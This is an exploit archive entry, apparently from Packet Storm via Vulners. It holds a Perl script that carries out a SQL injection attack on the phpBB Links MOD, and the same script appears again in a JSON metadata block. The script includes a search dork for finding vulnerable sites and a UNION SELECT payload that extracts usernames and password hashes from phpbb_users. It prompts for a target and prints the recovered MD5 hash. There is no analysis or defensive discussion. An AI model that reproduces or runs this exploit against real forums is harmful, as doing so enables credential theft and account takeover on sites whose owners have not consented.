Search...

phpbblinks-sql.txt

2007-08-31T00:00:00

ID PACKETSTORM:58978
Type packetstorm
Reporter Don
Modified 2007-08-31T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
print q{  
  
phpBB &lt;= 2.0.22 - Links MOD &lt;= v1.2.2 Remote SQL Injection Exploit  
  
Bug discovered by Don  
Dork: allinurl:links.php?t=search  
or: "Links MOD v1.2.2 by phpBB2.de"  
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*  
  
};  
  
use IO::Socket;  
  
print q{  
=&gt; Insert URL  
=&gt; without ( http )  
=&gt; };  
$server = &lt;STDIN&gt;;  
chop ($server);  
print q{  
=&gt; Insert directory  
=&gt; es: /forum/ - /phpBB2/  
=&gt; };  
$dir = &lt;STDIN&gt;;  
chop ($dir);  
print q{  
=&gt; User ID  
=&gt; Number:  
=&gt; };  
$user = &lt;STDIN&gt;;  
chop ($user);  
if (!$ARGV[2]) {  
}  
$myuser = $ARGV[3];  
$mypass = $ARGV[4];  
$myid = $ARGV[5];  
$server =~ s/(http:\/\/)//eg;  
$path = $dir;  
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";  
print "  
Exploit in process...\r\n";  
$socket = IO::Socket::INET-&gt;new(  
Proto =&gt; "tcp",  
PeerAddr =&gt; "$server",  
PeerPort =&gt; "80") || die "Exploit failed";  
print "Exploit\r\n";  
print "in process...\r\n";  
print $socket "GET $path HTTP/1.1\r\n";  
print $socket "Host: $server\r\n";  
print $socket "Accept: */*\r\n";  
print $socket "Connection: close\r\n\r\n";  
print "Exploit finished!\r\n\r\n";  
while ($answer = &lt;$socket&gt;)  
{  
if ($answer =~/(\w{32})/)  
{  
if ($1 ne 0) {  
print "MD5-Hash is: ".$1."\r\n";  
}  
exit();  
}  
}  
  
`

JSON Vulners Source

Initial Source

{"hash": "8e4ae7e7ef2dd3cbaa4458097e16575f9f54cd3c793c09cdd4a66537bf477ab3", "sourceHref": "https://packetstormsecurity.com/files/download/58978/phpbblinks-sql.txt", "title": "phpbblinks-sql.txt", "id": "PACKETSTORM:58978", "published": "2007-08-31T00:00:00", "description": "", "modified": "2007-08-31T00:00:00", "sourceData": "`#!/usr/bin/perl \n \nprint q{ \n \nphpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit \n \nBug discovered by Don \nDork: allinurl:links.php?t=search \nor: \"Links MOD v1.2.2 by phpBB2.de\" \nSQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/* \n \n}; \n \nuse IO::Socket; \n \nprint q{ \n=> Insert URL \n=> without ( http ) \n=> }; \n$server = <STDIN>; \nchop ($server); \nprint q{ \n=> Insert directory \n=> es: /forum/ - /phpBB2/ \n=> }; \n$dir = <STDIN>; \nchop ($dir); \nprint q{ \n=> User ID \n=> Number: \n=> }; \n$user = <STDIN>; \nchop ($user); \nif (!$ARGV[2]) { \n} \n$myuser = $ARGV[3]; \n$mypass = $ARGV[4]; \n$myid = $ARGV[5]; \n$server =~ s/(http:\\/\\/)//eg; \n$path = $dir; \n$path .= \"links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=\".$user.\"/*\"; \nprint \" \nExploit in process...\\r\\n\"; \n$socket = IO::Socket::INET->new( \nProto => \"tcp\", \nPeerAddr => \"$server\", \nPeerPort => \"80\") || die \"Exploit failed\"; \nprint \"Exploit\\r\\n\"; \nprint \"in process...\\r\\n\"; \nprint $socket \"GET $path HTTP/1.1\\r\\n\"; \nprint $socket \"Host: $server\\r\\n\"; \nprint $socket \"Accept: */*\\r\\n\"; \nprint $socket \"Connection: close\\r\\n\\r\\n\"; \nprint \"Exploit finished!\\r\\n\\r\\n\"; \nwhile ($answer = <$socket>) \n{ \nif ($answer =~/(\\w{32})/) \n{ \nif ($1 ne 0) { \nprint \"MD5-Hash is: \".$1.\"\\r\\n\"; \n} \nexit(); \n} \n} \n \n`\n", "reporter": "Don", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d7e6e81266847a14a81ece7005f271d8"}, {"key": "modified", "hash": "5f0548b8682eda9a0bf935bb46f9014d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5f0548b8682eda9a0bf935bb46f9014d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "b70e7b267b0652ee4030c4043cba7cf7"}, {"key": "sourceData", "hash": "d30bf810ca131b97e2235bdd8d60a89f"}, {"key": "sourceHref", "hash": "339d0a827207b7e606c3f4ec7a978107"}, {"key": "title", "hash": "9b762fb31ed0973cfeb6b2ca81dc3a17"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/58978/phpbblinks-sql.txt.html", "lastseen": "2016-11-03T10:21:03", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}